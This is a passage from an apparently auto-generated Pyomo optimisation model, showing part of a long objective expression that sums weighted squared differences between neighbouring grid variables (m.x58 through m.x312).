+ (1.3*m.x83 - 1.3*m.x84)**2) + 5.25340790999347*((8.11690209768664*m.x58 - 8.11690209768664*
m.x85)**2 + (1.3*m.x84 - 1.3*m.x85)**2) + 5.25340790999347*((8.11690209768664*m.x59 -
8.11690209768664*m.x86)**2 + (1.3*m.x85 - 1.3*m.x86)**2) + 5.25340790999347*((8.11690209768664*
m.x60 - 8.11690209768664*m.x87)**2 + (1.3*m.x86 - 1.3*m.x87)**2) + 5.25340790999347*((
8.11690209768664*m.x61 - 8.11690209768664*m.x88)**2 + (1.3*m.x87 - 1.3*m.x88)**2) +
5.25340790999347*((8.11690209768664*m.x62 - 8.11690209768664*m.x89)**2 + (1.3*m.x88 - 1.3*m.x89)
**2) + 5.25340790999347*((8.11690209768664*m.x63 - 8.11690209768664*m.x90)**2 + (1.3*m.x89 - 1.3*
m.x90)**2) + 5.25340790999347*((8.11690209768664*m.x64 - 8.11690209768664*m.x91)**2 + (1.3*m.x90
- 1.3*m.x91)**2) + 5.25340790999347*((8.11690209768664*m.x65 - 8.11690209768664*m.x92)**2 + (1.3
*m.x91 - 1.3*m.x92)**2) + 5.25340790999347*((8.11690209768664*m.x66 - 8.11690209768664*m.x93)**2
+ (1.3*m.x92 - 1.3*m.x93)**2) + 5.25340790999347*((8.11690209768664*m.x67 - 8.11690209768664*
m.x94)**2 + (1.3*m.x93 - 1.3*m.x94)**2) + 5.25340790999347*((8.11690209768664*m.x68 -
8.11690209768664*m.x95)**2 + (1.3*m.x94 - 1.3*m.x95)**2) + 5.25340790999347*((8.11690209768664*
m.x69 - 8.11690209768664*m.x96)**2 + (1.3*m.x95 - 1.3*m.x96)**2) + 5.25340790999347*((
8.11690209768664*m.x70 - 8.11690209768664*m.x97)**2 + (1.3*m.x96 - 1.3*m.x97)**2) +
5.25340790999347*((8.11690209768664*m.x71 - 8.11690209768664*m.x98)**2 + (1.3*m.x97 - 1.3*m.x98)
**2) + 5.25340790999347*((8.11690209768664*m.x72 - 8.11690209768664*m.x99)**2 + (1.3*m.x98 - 1.3*
m.x99)**2) + 5.25340790999347*((8.11690209768664*m.x73 - 8.11690209768664*m.x100)**2 + (1.3*m.x99
- 1.3*m.x100)**2) + 5.25340790999347*((8.11690209768664*m.x74 - 8.11690209768664*m.x101)**2 + (
1.3*m.x100 - 1.3*m.x101)**2) + 5.25340790999347*((8.11690209768664*m.x75 - 8.11690209768664*
m.x102)**2 + (1.3*m.x101 - 1.3*m.x102)**2) + 5.25340790999347*((8.11690209768664*m.x76 -
8.11690209768664*m.x103)**2 + (1.3*m.x102 - 1.3*m.x103)**2) + 5.25340790999347*((8.11690209768664
*m.x77 - 8.11690209768664*m.x104)**2 + (1.3*m.x103 - 1.3*m.x104)**2) + 5.25340790999347*((
8.11690209768664*m.x78 - 8.11690209768664*m.x105)**2 + (1.3*m.x104 - 1.3*m.x105)**2) +
5.25340790999347*((8.11690209768664*m.x79 - 8.11690209768664*m.x106)**2 + (1.3*m.x105 - 1.3*
m.x106)**2) + 5.25340790999347*((8.11690209768664*m.x80 - 8.11690209768664*m.x107)**2 + (1.3*
m.x106 - 1.3*m.x107)**2) + 5.25340790999347*((8.11690209768664*m.x81 - 8.11690209768664*m.x108)**
2 + (1.3*m.x107 - 1.3*m.x108)**2) + 5.18982110091267*((8.11690209768664*m.x83 - 8.11690209768664*
m.x110)**2 + (1.3*m.x109 - 1.3*m.x110)**2) + 5.18982110091267*((8.11690209768664*m.x84 -
8.11690209768664*m.x111)**2 + (1.3*m.x110 - 1.3*m.x111)**2) + 5.18982110091267*((8.11690209768664
*m.x85 - 8.11690209768664*m.x112)**2 + (1.3*m.x111 - 1.3*m.x112)**2) + 5.18982110091267*((
8.11690209768664*m.x86 - 8.11690209768664*m.x113)**2 + (1.3*m.x112 - 1.3*m.x113)**2) +
5.18982110091267*((8.11690209768664*m.x87 - 8.11690209768664*m.x114)**2 + (1.3*m.x113 - 1.3*
m.x114)**2) + 5.18982110091267*((8.11690209768664*m.x88 - 8.11690209768664*m.x115)**2 + (1.3*
m.x114 - 1.3*m.x115)**2) + 5.18982110091267*((8.11690209768664*m.x89 - 8.11690209768664*m.x116)**
2 + (1.3*m.x115 - 1.3*m.x116)**2) + 5.18982110091267*((8.11690209768664*m.x90 - 8.11690209768664*
m.x117)**2 + (1.3*m.x116 - 1.3*m.x117)**2) + 5.18982110091267*((8.11690209768664*m.x91 -
8.11690209768664*m.x118)**2 + (1.3*m.x117 - 1.3*m.x118)**2) + 5.18982110091267*((8.11690209768664
*m.x92 - 8.11690209768664*m.x119)**2 + (1.3*m.x118 - 1.3*m.x119)**2) + 5.18982110091267*((
8.11690209768664*m.x93 - 8.11690209768664*m.x120)**2 + (1.3*m.x119 - 1.3*m.x120)**2) +
5.18982110091267*((8.11690209768664*m.x94 - 8.11690209768664*m.x121)**2 + (1.3*m.x120 - 1.3*
m.x121)**2) + 5.18982110091267*((8.11690209768664*m.x95 - 8.11690209768664*m.x122)**2 + (1.3*
m.x121 - 1.3*m.x122)**2) + 5.18982110091267*((8.11690209768664*m.x96 - 8.11690209768664*m.x123)**
2 + (1.3*m.x122 - 1.3*m.x123)**2) + 5.18982110091267*((8.11690209768664*m.x97 - 8.11690209768664*
m.x124)**2 + (1.3*m.x123 - 1.3*m.x124)**2) + 5.18982110091267*((8.11690209768664*m.x98 -
8.11690209768664*m.x125)**2 + (1.3*m.x124 - 1.3*m.x125)**2) + 5.18982110091267*((8.11690209768664
*m.x99 - 8.11690209768664*m.x126)**2 + (1.3*m.x125 - 1.3*m.x126)**2) + 5.18982110091267*((
8.11690209768664*m.x100 - 8.11690209768664*m.x127)**2 + (1.3*m.x126 - 1.3*m.x127)**2) +
5.18982110091267*((8.11690209768664*m.x101 - 8.11690209768664*m.x128)**2 + (1.3*m.x127 - 1.3*
m.x128)**2) + 5.18982110091267*((8.11690209768664*m.x102 - 8.11690209768664*m.x129)**2 + (1.3*
m.x128 - 1.3*m.x129)**2) + 5.18982110091267*((8.11690209768664*m.x103 - 8.11690209768664*m.x130)
**2 + (1.3*m.x129 - 1.3*m.x130)**2) + 5.18982110091267*((8.11690209768664*m.x104 -
8.11690209768664*m.x131)**2 + (1.3*m.x130 - 1.3*m.x131)**2) + 5.18982110091267*((8.11690209768664
*m.x105 - 8.11690209768664*m.x132)**2 + (1.3*m.x131 - 1.3*m.x132)**2) + 5.18982110091267*((
8.11690209768664*m.x106 - 8.11690209768664*m.x133)**2 + (1.3*m.x132 - 1.3*m.x133)**2) +
5.18982110091267*((8.11690209768664*m.x107 - 8.11690209768664*m.x134)**2 + (1.3*m.x133 - 1.3*
m.x134)**2) + 5.18982110091267*((8.11690209768664*m.x108 - 8.11690209768664*m.x135)**2 + (1.3*
m.x134 - 1.3*m.x135)**2) + 5.10732217350307*((8.11690209768664*m.x110 - 8.11690209768664*m.x137)
**2 + (1.3*m.x136 - 1.3*m.x137)**2) + 5.10732217350307*((8.11690209768664*m.x111 -
8.11690209768664*m.x138)**2 + (1.3*m.x137 - 1.3*m.x138)**2) + 5.10732217350307*((8.11690209768664
*m.x112 - 8.11690209768664*m.x139)**2 + (1.3*m.x138 - 1.3*m.x139)**2) + 5.10732217350307*((
8.11690209768664*m.x113 - 8.11690209768664*m.x140)**2 + (1.3*m.x139 - 1.3*m.x140)**2) +
5.10732217350307*((8.11690209768664*m.x114 - 8.11690209768664*m.x141)**2 + (1.3*m.x140 - 1.3*
m.x141)**2) + 5.10732217350307*((8.11690209768664*m.x115 - 8.11690209768664*m.x142)**2 + (1.3*
m.x141 - 1.3*m.x142)**2) + 5.10732217350307*((8.11690209768664*m.x116 - 8.11690209768664*m.x143)
**2 + (1.3*m.x142 - 1.3*m.x143)**2) + 5.10732217350307*((8.11690209768664*m.x117 -
8.11690209768664*m.x144)**2 + (1.3*m.x143 - 1.3*m.x144)**2) + 5.10732217350307*((8.11690209768664
*m.x118 - 8.11690209768664*m.x145)**2 + (1.3*m.x144 - 1.3*m.x145)**2) + 5.10732217350307*((
8.11690209768664*m.x119 - 8.11690209768664*m.x146)**2 + (1.3*m.x145 - 1.3*m.x146)**2) +
5.10732217350307*((8.11690209768664*m.x120 - 8.11690209768664*m.x147)**2 + (1.3*m.x146 - 1.3*
m.x147)**2) + 5.10732217350307*((8.11690209768664*m.x121 - 8.11690209768664*m.x148)**2 + (1.3*
m.x147 - 1.3*m.x148)**2) + 5.10732217350307*((8.11690209768664*m.x122 - 8.11690209768664*m.x149)
**2 + (1.3*m.x148 - 1.3*m.x149)**2) + 5.10732217350307*((8.11690209768664*m.x123 -
8.11690209768664*m.x150)**2 + (1.3*m.x149 - 1.3*m.x150)**2) + 5.10732217350307*((8.11690209768664
*m.x124 - 8.11690209768664*m.x151)**2 + (1.3*m.x150 - 1.3*m.x151)**2) + 5.10732217350307*((
8.11690209768664*m.x125 - 8.11690209768664*m.x152)**2 + (1.3*m.x151 - 1.3*m.x152)**2) +
5.10732217350307*((8.11690209768664*m.x126 - 8.11690209768664*m.x153)**2 + (1.3*m.x152 - 1.3*
m.x153)**2) + 5.10732217350307*((8.11690209768664*m.x127 - 8.11690209768664*m.x154)**2 + (1.3*
m.x153 - 1.3*m.x154)**2) + 5.10732217350307*((8.11690209768664*m.x128 - 8.11690209768664*m.x155)
**2 + (1.3*m.x154 - 1.3*m.x155)**2) + 5.10732217350307*((8.11690209768664*m.x129 -
8.11690209768664*m.x156)**2 + (1.3*m.x155 - 1.3*m.x156)**2) + 5.10732217350307*((8.11690209768664
*m.x130 - 8.11690209768664*m.x157)**2 + (1.3*m.x156 - 1.3*m.x157)**2) + 5.10732217350307*((
8.11690209768664*m.x131 - 8.11690209768664*m.x158)**2 + (1.3*m.x157 - 1.3*m.x158)**2) +
5.10732217350307*((8.11690209768664*m.x132 - 8.11690209768664*m.x159)**2 + (1.3*m.x158 - 1.3*
m.x159)**2) + 5.10732217350307*((8.11690209768664*m.x133 - 8.11690209768664*m.x160)**2 + (1.3*
m.x159 - 1.3*m.x160)**2) + 5.10732217350307*((8.11690209768664*m.x134 - 8.11690209768664*m.x161)
**2 + (1.3*m.x160 - 1.3*m.x161)**2) + 5.10732217350307*((8.11690209768664*m.x135 -
8.11690209768664*m.x162)**2 + (1.3*m.x161 - 1.3*m.x162)**2) + 5.00775685244556*((8.11690209768664
*m.x137 - 8.11690209768664*m.x164)**2 + (1.3*m.x163 - 1.3*m.x164)**2) + 5.00775685244556*((
8.11690209768664*m.x138 - 8.11690209768664*m.x165)**2 + (1.3*m.x164 - 1.3*m.x165)**2) +
5.00775685244556*((8.11690209768664*m.x139 - 8.11690209768664*m.x166)**2 + (1.3*m.x165 - 1.3*
m.x166)**2) + 5.00775685244556*((8.11690209768664*m.x140 - 8.11690209768664*m.x167)**2 + (1.3*
m.x166 - 1.3*m.x167)**2) + 5.00775685244556*((8.11690209768664*m.x141 - 8.11690209768664*m.x168)
**2 + (1.3*m.x167 - 1.3*m.x168)**2) + 5.00775685244556*((8.11690209768664*m.x142 -
8.11690209768664*m.x169)**2 + (1.3*m.x168 - 1.3*m.x169)**2) + 5.00775685244556*((8.11690209768664
*m.x143 - 8.11690209768664*m.x170)**2 + (1.3*m.x169 - 1.3*m.x170)**2) + 5.00775685244556*((
8.11690209768664*m.x144 - 8.11690209768664*m.x171)**2 + (1.3*m.x170 - 1.3*m.x171)**2) +
5.00775685244556*((8.11690209768664*m.x145 - 8.11690209768664*m.x172)**2 + (1.3*m.x171 - 1.3*
m.x172)**2) + 5.00775685244556*((8.11690209768664*m.x146 - 8.11690209768664*m.x173)**2 + (1.3*
m.x172 - 1.3*m.x173)**2) + 5.00775685244556*((8.11690209768664*m.x147 - 8.11690209768664*m.x174)
**2 + (1.3*m.x173 - 1.3*m.x174)**2) + 5.00775685244556*((8.11690209768664*m.x148 -
8.11690209768664*m.x175)**2 + (1.3*m.x174 - 1.3*m.x175)**2) + 5.00775685244556*((8.11690209768664
*m.x149 - 8.11690209768664*m.x176)**2 + (1.3*m.x175 - 1.3*m.x176)**2) + 5.00775685244556*((
8.11690209768664*m.x150 - 8.11690209768664*m.x177)**2 + (1.3*m.x176 - 1.3*m.x177)**2) +
5.00775685244556*((8.11690209768664*m.x151 - 8.11690209768664*m.x178)**2 + (1.3*m.x177 - 1.3*
m.x178)**2) + 5.00775685244556*((8.11690209768664*m.x152 - 8.11690209768664*m.x179)**2 + (1.3*
m.x178 - 1.3*m.x179)**2) + 5.00775685244556*((8.11690209768664*m.x153 - 8.11690209768664*m.x180)
**2 + (1.3*m.x179 - 1.3*m.x180)**2) + 5.00775685244556*((8.11690209768664*m.x154 -
8.11690209768664*m.x181)**2 + (1.3*m.x180 - 1.3*m.x181)**2) + 5.00775685244556*((8.11690209768664
*m.x155 - 8.11690209768664*m.x182)**2 + (1.3*m.x181 - 1.3*m.x182)**2) + 5.00775685244556*((
8.11690209768664*m.x156 - 8.11690209768664*m.x183)**2 + (1.3*m.x182 - 1.3*m.x183)**2) +
5.00775685244556*((8.11690209768664*m.x157 - 8.11690209768664*m.x184)**2 + (1.3*m.x183 - 1.3*
m.x184)**2) + 5.00775685244556*((8.11690209768664*m.x158 - 8.11690209768664*m.x185)**2 + (1.3*
m.x184 - 1.3*m.x185)**2) + 5.00775685244556*((8.11690209768664*m.x159 - 8.11690209768664*m.x186)
**2 + (1.3*m.x185 - 1.3*m.x186)**2) + 5.00775685244556*((8.11690209768664*m.x160 -
8.11690209768664*m.x187)**2 + (1.3*m.x186 - 1.3*m.x187)**2) + 5.00775685244556*((8.11690209768664
*m.x161 - 8.11690209768664*m.x188)**2 + (1.3*m.x187 - 1.3*m.x188)**2) + 5.00775685244556*((
8.11690209768664*m.x162 - 8.11690209768664*m.x189)**2 + (1.3*m.x188 - 1.3*m.x189)**2) +
4.89330064653256*((8.11690209768664*m.x164 - 8.11690209768664*m.x191)**2 + (1.3*m.x190 - 1.3*
m.x191)**2) + 4.89330064653256*((8.11690209768664*m.x165 - 8.11690209768664*m.x192)**2 + (1.3*
m.x191 - 1.3*m.x192)**2) + 4.89330064653256*((8.11690209768664*m.x166 - 8.11690209768664*m.x193)
**2 + (1.3*m.x192 - 1.3*m.x193)**2) + 4.89330064653256*((8.11690209768664*m.x167 -
8.11690209768664*m.x194)**2 + (1.3*m.x193 - 1.3*m.x194)**2) + 4.89330064653256*((8.11690209768664
*m.x168 - 8.11690209768664*m.x195)**2 + (1.3*m.x194 - 1.3*m.x195)**2) + 4.89330064653256*((
8.11690209768664*m.x169 - 8.11690209768664*m.x196)**2 + (1.3*m.x195 - 1.3*m.x196)**2) +
4.89330064653256*((8.11690209768664*m.x170 - 8.11690209768664*m.x197)**2 + (1.3*m.x196 - 1.3*
m.x197)**2) + 4.89330064653256*((8.11690209768664*m.x171 - 8.11690209768664*m.x198)**2 + (1.3*
m.x197 - 1.3*m.x198)**2) + 4.89330064653256*((8.11690209768664*m.x172 - 8.11690209768664*m.x199)
**2 + (1.3*m.x198 - 1.3*m.x199)**2) + 4.89330064653256*((8.11690209768664*m.x173 -
8.11690209768664*m.x200)**2 + (1.3*m.x199 - 1.3*m.x200)**2) + 4.89330064653256*((8.11690209768664
*m.x174 - 8.11690209768664*m.x201)**2 + (1.3*m.x200 - 1.3*m.x201)**2) + 4.89330064653256*((
8.11690209768664*m.x175 - 8.11690209768664*m.x202)**2 + (1.3*m.x201 - 1.3*m.x202)**2) +
4.89330064653256*((8.11690209768664*m.x176 - 8.11690209768664*m.x203)**2 + (1.3*m.x202 - 1.3*
m.x203)**2) + 4.89330064653256*((8.11690209768664*m.x177 - 8.11690209768664*m.x204)**2 + (1.3*
m.x203 - 1.3*m.x204)**2) + 4.89330064653256*((8.11690209768664*m.x178 - 8.11690209768664*m.x205)
**2 + (1.3*m.x204 - 1.3*m.x205)**2) + 4.89330064653256*((8.11690209768664*m.x179 -
8.11690209768664*m.x206)**2 + (1.3*m.x205 - 1.3*m.x206)**2) + 4.89330064653256*((8.11690209768664
*m.x180 - 8.11690209768664*m.x207)**2 + (1.3*m.x206 - 1.3*m.x207)**2) + 4.89330064653256*((
8.11690209768664*m.x181 - 8.11690209768664*m.x208)**2 + (1.3*m.x207 - 1.3*m.x208)**2) +
4.89330064653256*((8.11690209768664*m.x182 - 8.11690209768664*m.x209)**2 + (1.3*m.x208 - 1.3*
m.x209)**2) + 4.89330064653256*((8.11690209768664*m.x183 - 8.11690209768664*m.x210)**2 + (1.3*
m.x209 - 1.3*m.x210)**2) + 4.89330064653256*((8.11690209768664*m.x184 - 8.11690209768664*m.x211)
**2 + (1.3*m.x210 - 1.3*m.x211)**2) + 4.89330064653256*((8.11690209768664*m.x185 -
8.11690209768664*m.x212)**2 + (1.3*m.x211 - 1.3*m.x212)**2) + 4.89330064653256*((8.11690209768664
*m.x186 - 8.11690209768664*m.x213)**2 + (1.3*m.x212 - 1.3*m.x213)**2) + 4.89330064653256*((
8.11690209768664*m.x187 - 8.11690209768664*m.x214)**2 + (1.3*m.x213 - 1.3*m.x214)**2) +
4.89330064653256*((8.11690209768664*m.x188 - 8.11690209768664*m.x215)**2 + (1.3*m.x214 - 1.3*
m.x215)**2) + 4.89330064653256*((8.11690209768664*m.x189 - 8.11690209768664*m.x216)**2 + (1.3*
m.x215 - 1.3*m.x216)**2) + 4.76638251784575*((8.11690209768664*m.x191 - 8.11690209768664*m.x218)
**2 + (1.3*m.x217 - 1.3*m.x218)**2) + 4.76638251784575*((8.11690209768664*m.x192 -
8.11690209768664*m.x219)**2 + (1.3*m.x218 - 1.3*m.x219)**2) + 4.76638251784575*((8.11690209768664
*m.x193 - 8.11690209768664*m.x220)**2 + (1.3*m.x219 - 1.3*m.x220)**2) + 4.76638251784575*((
8.11690209768664*m.x194 - 8.11690209768664*m.x221)**2 + (1.3*m.x220 - 1.3*m.x221)**2) +
4.76638251784575*((8.11690209768664*m.x195 - 8.11690209768664*m.x222)**2 + (1.3*m.x221 - 1.3*
m.x222)**2) + 4.76638251784575*((8.11690209768664*m.x196 - 8.11690209768664*m.x223)**2 + (1.3*
m.x222 - 1.3*m.x223)**2) + 4.76638251784575*((8.11690209768664*m.x197 - 8.11690209768664*m.x224)
**2 + (1.3*m.x223 - 1.3*m.x224)**2) + 4.76638251784575*((8.11690209768664*m.x198 -
8.11690209768664*m.x225)**2 + (1.3*m.x224 - 1.3*m.x225)**2) + 4.76638251784575*((8.11690209768664
*m.x199 - 8.11690209768664*m.x226)**2 + (1.3*m.x225 - 1.3*m.x226)**2) + 4.76638251784575*((
8.11690209768664*m.x200 - 8.11690209768664*m.x227)**2 + (1.3*m.x226 - 1.3*m.x227)**2) +
4.76638251784575*((8.11690209768664*m.x201 - 8.11690209768664*m.x228)**2 + (1.3*m.x227 - 1.3*
m.x228)**2) + 4.76638251784575*((8.11690209768664*m.x202 - 8.11690209768664*m.x229)**2 + (1.3*
m.x228 - 1.3*m.x229)**2) + 4.76638251784575*((8.11690209768664*m.x203 - 8.11690209768664*m.x230)
**2 + (1.3*m.x229 - 1.3*m.x230)**2) + 4.76638251784575*((8.11690209768664*m.x204 -
8.11690209768664*m.x231)**2 + (1.3*m.x230 - 1.3*m.x231)**2) + 4.76638251784575*((8.11690209768664
*m.x205 - 8.11690209768664*m.x232)**2 + (1.3*m.x231 - 1.3*m.x232)**2) + 4.76638251784575*((
8.11690209768664*m.x206 - 8.11690209768664*m.x233)**2 + (1.3*m.x232 - 1.3*m.x233)**2) +
4.76638251784575*((8.11690209768664*m.x207 - 8.11690209768664*m.x234)**2 + (1.3*m.x233 - 1.3*
m.x234)**2) + 4.76638251784575*((8.11690209768664*m.x208 - 8.11690209768664*m.x235)**2 + (1.3*
m.x234 - 1.3*m.x235)**2) + 4.76638251784575*((8.11690209768664*m.x209 - 8.11690209768664*m.x236)
**2 + (1.3*m.x235 - 1.3*m.x236)**2) + 4.76638251784575*((8.11690209768664*m.x210 -
8.11690209768664*m.x237)**2 + (1.3*m.x236 - 1.3*m.x237)**2) + 4.76638251784575*((8.11690209768664
*m.x211 - 8.11690209768664*m.x238)**2 + (1.3*m.x237 - 1.3*m.x238)**2) + 4.76638251784575*((
8.11690209768664*m.x212 - 8.11690209768664*m.x239)**2 + (1.3*m.x238 - 1.3*m.x239)**2) +
4.76638251784575*((8.11690209768664*m.x213 - 8.11690209768664*m.x240)**2 + (1.3*m.x239 - 1.3*
m.x240)**2) + 4.76638251784575*((8.11690209768664*m.x214 - 8.11690209768664*m.x241)**2 + (1.3*
m.x240 - 1.3*m.x241)**2) + 4.76638251784575*((8.11690209768664*m.x215 - 8.11690209768664*m.x242)
**2 + (1.3*m.x241 - 1.3*m.x242)**2) + 4.76638251784575*((8.11690209768664*m.x216 -
8.11690209768664*m.x243)**2 + (1.3*m.x242 - 1.3*m.x243)**2) + 4.62960356384549*((8.11690209768664
*m.x218 - 8.11690209768664*m.x245)**2 + (1.3*m.x244 - 1.3*m.x245)**2) + 4.62960356384549*((
8.11690209768664*m.x219 - 8.11690209768664*m.x246)**2 + (1.3*m.x245 - 1.3*m.x246)**2) +
4.62960356384549*((8.11690209768664*m.x220 - 8.11690209768664*m.x247)**2 + (1.3*m.x246 - 1.3*
m.x247)**2) + 4.62960356384549*((8.11690209768664*m.x221 - 8.11690209768664*m.x248)**2 + (1.3*
m.x247 - 1.3*m.x248)**2) + 4.62960356384549*((8.11690209768664*m.x222 - 8.11690209768664*m.x249)
**2 + (1.3*m.x248 - 1.3*m.x249)**2) + 4.62960356384549*((8.11690209768664*m.x223 -
8.11690209768664*m.x250)**2 + (1.3*m.x249 - 1.3*m.x250)**2) + 4.62960356384549*((8.11690209768664
*m.x224 - 8.11690209768664*m.x251)**2 + (1.3*m.x250 - 1.3*m.x251)**2) + 4.62960356384549*((
8.11690209768664*m.x225 - 8.11690209768664*m.x252)**2 + (1.3*m.x251 - 1.3*m.x252)**2) +
4.62960356384549*((8.11690209768664*m.x226 - 8.11690209768664*m.x253)**2 + (1.3*m.x252 - 1.3*
m.x253)**2) + 4.62960356384549*((8.11690209768664*m.x227 - 8.11690209768664*m.x254)**2 + (1.3*
m.x253 - 1.3*m.x254)**2) + 4.62960356384549*((8.11690209768664*m.x228 - 8.11690209768664*m.x255)
**2 + (1.3*m.x254 - 1.3*m.x255)**2) + 4.62960356384549*((8.11690209768664*m.x229 -
8.11690209768664*m.x256)**2 + (1.3*m.x255 - 1.3*m.x256)**2) + 4.62960356384549*((8.11690209768664
*m.x230 - 8.11690209768664*m.x257)**2 + (1.3*m.x256 - 1.3*m.x257)**2) + 4.62960356384549*((
8.11690209768664*m.x231 - 8.11690209768664*m.x258)**2 + (1.3*m.x257 - 1.3*m.x258)**2) +
4.62960356384549*((8.11690209768664*m.x232 - 8.11690209768664*m.x259)**2 + (1.3*m.x258 - 1.3*
m.x259)**2) + 4.62960356384549*((8.11690209768664*m.x233 - 8.11690209768664*m.x260)**2 + (1.3*
m.x259 - 1.3*m.x260)**2) + 4.62960356384549*((8.11690209768664*m.x234 - 8.11690209768664*m.x261)
**2 + (1.3*m.x260 - 1.3*m.x261)**2) + 4.62960356384549*((8.11690209768664*m.x235 -
8.11690209768664*m.x262)**2 + (1.3*m.x261 - 1.3*m.x262)**2) + 4.62960356384549*((8.11690209768664
*m.x236 - 8.11690209768664*m.x263)**2 + (1.3*m.x262 - 1.3*m.x263)**2) + 4.62960356384549*((
8.11690209768664*m.x237 - 8.11690209768664*m.x264)**2 + (1.3*m.x263 - 1.3*m.x264)**2) +
4.62960356384549*((8.11690209768664*m.x238 - 8.11690209768664*m.x265)**2 + (1.3*m.x264 - 1.3*
m.x265)**2) + 4.62960356384549*((8.11690209768664*m.x239 - 8.11690209768664*m.x266)**2 + (1.3*
m.x265 - 1.3*m.x266)**2) + 4.62960356384549*((8.11690209768664*m.x240 - 8.11690209768664*m.x267)
**2 + (1.3*m.x266 - 1.3*m.x267)**2) + 4.62960356384549*((8.11690209768664*m.x241 -
8.11690209768664*m.x268)**2 + (1.3*m.x267 - 1.3*m.x268)**2) + 4.62960356384549*((8.11690209768664
*m.x242 - 8.11690209768664*m.x269)**2 + (1.3*m.x268 - 1.3*m.x269)**2) + 4.62960356384549*((
8.11690209768664*m.x243 - 8.11690209768664*m.x270)**2 + (1.3*m.x269 - 1.3*m.x270)**2) +
4.48565498144175*((8.11690209768664*m.x245 - 8.11690209768664*m.x272)**2 + (1.3*m.x271 - 1.3*
m.x272)**2) + 4.48565498144175*((8.11690209768664*m.x246 - 8.11690209768664*m.x273)**2 + (1.3*
m.x272 - 1.3*m.x273)**2) + 4.48565498144175*((8.11690209768664*m.x247 - 8.11690209768664*m.x274)
**2 + (1.3*m.x273 - 1.3*m.x274)**2) + 4.48565498144175*((8.11690209768664*m.x248 -
8.11690209768664*m.x275)**2 + (1.3*m.x274 - 1.3*m.x275)**2) + 4.48565498144175*((8.11690209768664
*m.x249 - 8.11690209768664*m.x276)**2 + (1.3*m.x275 - 1.3*m.x276)**2) + 4.48565498144175*((
8.11690209768664*m.x250 - 8.11690209768664*m.x277)**2 + (1.3*m.x276 - 1.3*m.x277)**2) +
4.48565498144175*((8.11690209768664*m.x251 - 8.11690209768664*m.x278)**2 + (1.3*m.x277 - 1.3*
m.x278)**2) + 4.48565498144175*((8.11690209768664*m.x252 - 8.11690209768664*m.x279)**2 + (1.3*
m.x278 - 1.3*m.x279)**2) + 4.48565498144175*((8.11690209768664*m.x253 - 8.11690209768664*m.x280)
**2 + (1.3*m.x279 - 1.3*m.x280)**2) + 4.48565498144175*((8.11690209768664*m.x254 -
8.11690209768664*m.x281)**2 + (1.3*m.x280 - 1.3*m.x281)**2) + 4.48565498144175*((8.11690209768664
*m.x255 - 8.11690209768664*m.x282)**2 + (1.3*m.x281 - 1.3*m.x282)**2) + 4.48565498144175*((
8.11690209768664*m.x256 - 8.11690209768664*m.x283)**2 + (1.3*m.x282 - 1.3*m.x283)**2) +
4.48565498144175*((8.11690209768664*m.x257 - 8.11690209768664*m.x284)**2 + (1.3*m.x283 - 1.3*
m.x284)**2) + 4.48565498144175*((8.11690209768664*m.x258 - 8.11690209768664*m.x285)**2 + (1.3*
m.x284 - 1.3*m.x285)**2) + 4.48565498144175*((8.11690209768664*m.x259 - 8.11690209768664*m.x286)
**2 + (1.3*m.x285 - 1.3*m.x286)**2) + 4.48565498144175*((8.11690209768664*m.x260 -
8.11690209768664*m.x287)**2 + (1.3*m.x286 - 1.3*m.x287)**2) + 4.48565498144175*((8.11690209768664
*m.x261 - 8.11690209768664*m.x288)**2 + (1.3*m.x287 - 1.3*m.x288)**2) + 4.48565498144175*((
8.11690209768664*m.x262 - 8.11690209768664*m.x289)**2 + (1.3*m.x288 - 1.3*m.x289)**2) +
4.48565498144175*((8.11690209768664*m.x263 - 8.11690209768664*m.x290)**2 + (1.3*m.x289 - 1.3*
m.x290)**2) + 4.48565498144175*((8.11690209768664*m.x264 - 8.11690209768664*m.x291)**2 + (1.3*
m.x290 - 1.3*m.x291)**2) + 4.48565498144175*((8.11690209768664*m.x265 - 8.11690209768664*m.x292)
**2 + (1.3*m.x291 - 1.3*m.x292)**2) + 4.48565498144175*((8.11690209768664*m.x266 -
8.11690209768664*m.x293)**2 + (1.3*m.x292 - 1.3*m.x293)**2) + 4.48565498144175*((8.11690209768664
*m.x267 - 8.11690209768664*m.x294)**2 + (1.3*m.x293 - 1.3*m.x294)**2) + 4.48565498144175*((
8.11690209768664*m.x268 - 8.11690209768664*m.x295)**2 + (1.3*m.x294 - 1.3*m.x295)**2) +
4.48565498144175*((8.11690209768664*m.x269 - 8.11690209768664*m.x296)**2 + (1.3*m.x295 - 1.3*
m.x296)**2) + 4.48565498144175*((8.11690209768664*m.x270 - 8.11690209768664*m.x297)**2 + (1.3*
m.x296 - 1.3*m.x297)**2) + 4.33723936015931*((8.11690209768664*m.x272 - 8.11690209768664*m.x299)
**2 + (1.3*m.x298 - 1.3*m.x299)**2) + 4.33723936015931*((8.11690209768664*m.x273 -
8.11690209768664*m.x300)**2 + (1.3*m.x299 - 1.3*m.x300)**2) + 4.33723936015931*((8.11690209768664
*m.x274 - 8.11690209768664*m.x301)**2 + (1.3*m.x300 - 1.3*m.x301)**2) + 4.33723936015931*((
8.11690209768664*m.x275 - 8.11690209768664*m.x302)**2 + (1.3*m.x301 - 1.3*m.x302)**2) +
4.33723936015931*((8.11690209768664*m.x276 - 8.11690209768664*m.x303)**2 + (1.3*m.x302 - 1.3*
m.x303)**2) + 4.33723936015931*((8.11690209768664*m.x277 - 8.11690209768664*m.x304)**2 + (1.3*
m.x303 - 1.3*m.x304)**2) + 4.33723936015931*((8.11690209768664*m.x278 - 8.11690209768664*m.x305)
**2 + (1.3*m.x304 - 1.3*m.x305)**2) + 4.33723936015931*((8.11690209768664*m.x279 -
8.11690209768664*m.x306)**2 + (1.3*m.x305 - 1.3*m.x306)**2) + 4.33723936015931*((8.11690209768664
*m.x280 - 8.11690209768664*m.x307)**2 + (1.3*m.x306 - 1.3*m.x307)**2) + 4.33723936015931*((
8.11690209768664*m.x281 - 8.11690209768664*m.x308)**2 + (1.3*m.x307 - 1.3*m.x308)**2) +
4.33723936015931*((8.11690209768664*m.x282 - 8.11690209768664*m.x309)**2 + (1.3*m.x308 - 1.3*
m.x309)**2) + 4.33723936015931*((8.11690209768664*m.x283 - 8.11690209768664*m.x310)**2 + (1.3*
m.x309 - 1.3*m.x310)**2) + 4.33723936015931*((8.11690209768664*m.x284 - 8.11690209768664*m.x311)
**2 + (1.3*m.x310 - 1.3*m.x311)**2) + 4.33723936015931*((8.11690209768664*m.x285 -
8.11690209768664*m.x312)**2 + (1.3*m.x311 - 1.3*m.x312)**2) + 4.33723936015931*((8.11690209768664
